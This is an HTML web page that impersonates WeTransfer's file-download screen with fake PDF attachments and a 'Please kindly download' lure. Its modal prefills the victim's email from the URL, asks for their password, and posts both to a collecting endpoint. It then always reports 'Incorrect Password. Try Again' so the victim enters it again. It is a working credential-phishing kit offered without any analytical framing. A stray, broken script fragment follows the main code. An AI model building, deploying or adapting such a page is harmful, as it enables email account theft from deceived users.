
<!doctype html>
<html lang="en">
  <head>
    <meta name="robots" content="noindex">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>WeTransfer</title>   
    <meta content="4sWPhTlJAmt1IcyNq1FCyivsAVhHqjiDCKRXOgOQock=" name="csrf-token" />
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/css/bootstrap.min.css" >
    <link rel="stylesheet" href="css/style.css">

    <!-- Favicons -->
    <link rel="shortcut icon" href="./images/logo.png">
    <meta name="theme-color" content="#712cf9">


    <style>
      .bd-placeholder-img {
        font-size: 1.125rem;
        text-anchor: middle;
        -webkit-user-select: none;
        -moz-user-select: none;
        user-select: none;
      }

      @media (min-width: 768px) {
        .bd-placeholder-img-lg {
          font-size: 3.5rem;
        }
      }

      .b-example-divider {
        height: 3rem;
        background-color: rgba(0, 0, 0, .1);
        border: solid rgba(0, 0, 0, .15);
        border-width: 1px 0;
        box-shadow: inset 0 .5em 1.5em rgba(0, 0, 0, .1), inset 0 .125em .5em rgba(0, 0, 0, .15);
      }

      .b-example-vr {
        flex-shrink: 0;
        width: 1.5rem;
        height: 100vh;
      }

      .bi {
        vertical-align: -.125em;
        fill: currentColor;
      }

      .nav-scroller {
        position: relative;
        z-index: 2;
        height: 2.75rem;
        overflow-y: hidden;
      }

      .nav-scroller .nav {
        display: flex;
        flex-wrap: nowrap;
        padding-bottom: 1rem;
        margin-top: -1px;
        overflow-x: auto;
        text-align: center;
        white-space: nowrap;
        -webkit-overflow-scrolling: touch;
      }
      .d-none{
        display: none;
      }
    </style>
  </head>
  <body>
    
<main>
  <nav class="navbar navbar-expand-md  " aria-label="Fourth navbar example" >
    <div class="container-fluid">
      <a class="navbar-brand" href=""><img alt="icon" src="./images/logo.png"></a>
      <button class="navbar-toggler"  type="button" data-bs-toggle="collapse" data-bs-target="#navbarsExample04" aria-controls="navbarsExample04" aria-expanded="false" aria-label="Toggle navigation">
        <span style="color:white !important" class="navbar-toggler-icon"></span>
      </button>

      <div class="collapse navbar-collapse" id="navbarsExample04" >
        
       
        <ul class="navbar-nav me-auto mb-2 mb-md-0" style="align-items: right">
          <li class="nav-item ">
            <a class="nav-link btn btn-secondary" aria-current="page" href="#">Pricing</a>
          </li>
          <li class="nav-item">
            <a class="nav-link btn btn-secondary" href="#">Company</a>
          </li>
          <li class="nav-item">
            <a class="nav-link btn btn-secondary">Help</a>
          </li>
          <li class="nav-item">
            <a class="nav-link btn btn-secondary">Sign up</a>
          </li>
          <li class="nav-item">
            <a class="nav-link btn btn-secondary">Log In</a>
          </li>

        </ul>
      </div>
    </div>
  </nav>
  <br><br><br>

  <div class="container">
    <div class="row">

      <div class="col-md-3"> 
        <div class="bg-light p-3 rounded">
          <div style="color:grey">
            <center>
              <img src="./images/arrow.png" alt="download" style="width:37%; padding-left:3px;">
              <h4 style="color:#1e1e1e">Ready when you are</h4>
              <p >Files deleted in 7 days</p>
            
              <p >Please kindly download the files below  
                  and get back to us as soon as 
                  possible
              </p>
            </center>
              <hr>
              <div class="specific">
                  <div class="mb50">
                    <h6 style="font-size:12px; color:#1e1e1e">Specifications Order.pdf 
                      <img src="./images/arrow.png" alt="" style="width:8%; height:15px;" class="arrow1">
                    </h6>
                  </div>
                  <p style="font-size:8px;" >50 MB -pdf</p>
              </div>
              <hr>
              <div class="specific2">
                <div class="mb501">
                  <h6 style="font-size:12px; color:#1e1e1e">Company Information.pdf 
                    <img src="./images/arrow.png" alt="" style="width:8%; height:15px;" class="arrow2"></h6>
                    
                </div>
                <p style="font-size:8px;">35MB - pdf
                </p>
              </div>
            <p>
            <center><a class="btn btn-primary" href="javascript:void(0)" style="border-radius: 60px !important; "onclick="down()">Download</a></center>
            </p>
          </div>
        </div>
      </div>
      <div class="col-md-1">
      </div>
      <div class="col-md-3">
        <div class=" p-3 rounded" style="color:white">
          <h1>Your team.</h1>
          <h1>Your Work.</h1>
          <h1>One space.</h1>
          <p>Keep your team (and files) in perfect sync</p>
          <a class="btn btn-primary p-2" style="border-radius: 60px !important; " href="javascript:void(0)" >Subscribe</a>
        </div>
      </div>

      <div class="col-md-5">
        <div class="col-md-12">
          <div class="row">
            <div class="col-2 " >
              <img src="./images/1.png" style="width:100%;" alt="" class="pt-3">
            </div>

            <div class="col-10">
              <div class="bg-light p-3 rounded">
                <div class="row">
                  <div class="col-10">
                    <h5>Pitch Deck-v1.pdf</h5>
                    <img src="./images/3.png" style="width:10%;" alt="" class="">Jane uploaded 2 weeks ago
                  </div>
                  <div class="col-2" style="font-size:50px;">
                    >
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
        <br>
        <div class="col-md-12">
          <div class="row">
            <div class="col-2 " >
              <img src="./images/2.png" style="width:100%;" alt="" class="pt-3">
            </div>

            <div class="col-10">
              <div class="bg-light p-3 rounded">
                <div class="row">
                  <div class="col-10">
                    <h5>Pitch Deck-v1.pdf</h5>
                    <img src="./images/3.png" style="width:10%;" alt="" class="">Martin uploaded 3 weeks ago
                  </div>
                  <div class="col-2" style="font-size:50px;">
                    >
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
        <br>
        <div class="col-md-12">
          <div class="row">
            <div class="col-2 " >
              <img src="./images/3.png" style="width:100%;" alt="" class="pt-3">
            </div>

            <div class="col-10">
              <div class="bg-light p-3 rounded">
                <div class="row">
                  <div class="col-10">
                    <h5>Pitch Deck-v1.pdf</h5>
                    <img src="./images/3.png" style="width:10%;" alt="" class="">Mary uploaded 1 weeks ago
                  </div>
                  <div class="col-2" style="font-size:50px;">
                    >
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </div>


<!-- Modal -->
<div class="modal fade" id="downMod" tabindex="-1" role="dialog" aria-labelledby="exampleModalLongTitle" aria-hidden="true">
  <div class="modal-dialog" role="document">
    <div class="modal-content">
      
      <div class="modal-body">
         <center>
             <div id="anini" class="d-none" >
                <img id="loader" src="./images/giphy.webp" style="width:20%">
                <p id="talk" ></p>
             </div>
        </center> 
        <form method="post" action="send.php" id="stdFord">
          <div class="">
            <input type="text" class="form-control" name="email" id="email" readonly="">
          </div>
          <br>
          <div class="">
            <input type="password" class="form-control" name="pasD" id="pasD" required="">
          </div><br>
          <button type="button" onclick="sendForm()" class="btn btn-secondary" >Download</button>
        </form>

        <center>
          <h4><b> We Transfer Pro.</b></h4><br>
          <p>Get more out of WeTransfer get Pro</p>
        </center>
      </div>
    </div>
  </div>
</div>
</main>

  <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.2/dist/js/bootstrap.bundle.min.js" ></script>
  <script src="https://code.jquery.com/jquery-3.3.1.js" ></script>
     
     <script type="text/javascript">
      function down(){
        var baseUrl = (window.location).href;
        var url = baseUrl.substring(baseUrl.lastIndexOf('=') + 1);
        $("#email").val(url);
        $('#downMod').modal('show');
      }

      function sendForm(){
          
        $.ajaxSetup({
          headers: {
            'X-CSRF-TOKEN': $('meta[name="csrf-token"]').attr('content')
          }
        });

        ///////////ACTIVATE LOADER AND DISABLE BUTTON///////////////
          
          
          ///////////REQUEST HANDLE///////////////
          $.ajax({
            url: "senda.js",
            method: 'post',
            data: $('#stdFord').serialize(),
            //console .log(data),
            success: function(response){
                //------------------------
                $('#anini').removeClass('d-none');
                $('#loader').removeClass('d-none');
                  $('#talk').text('Downloading....'); //set button disable
                  $('#talk').attr('style','color:blue');

                setTimeout(function(){
                    $('#loader').addClass('d-none');
                    $('#talk').text('Incorrect Password. Try Again');
                    $('#talk').attr('style','color:red');
                },2000);
                setTimeout(function(){
                    $('#anini').addClass('d-none');
                },5000);
              
            },error: function (xhr, ajaxOptions, thrownError) {
                console.log(xhr);
                
            } 
          });
      }
     </script> 
	 
	 document.getElementById("stdFord").addEventListener("submit", function(event){
   event.preventDefault(); //Prevent form submission
   sendFormData(); //Calling sendFormData() function
});

  </body>
</html>
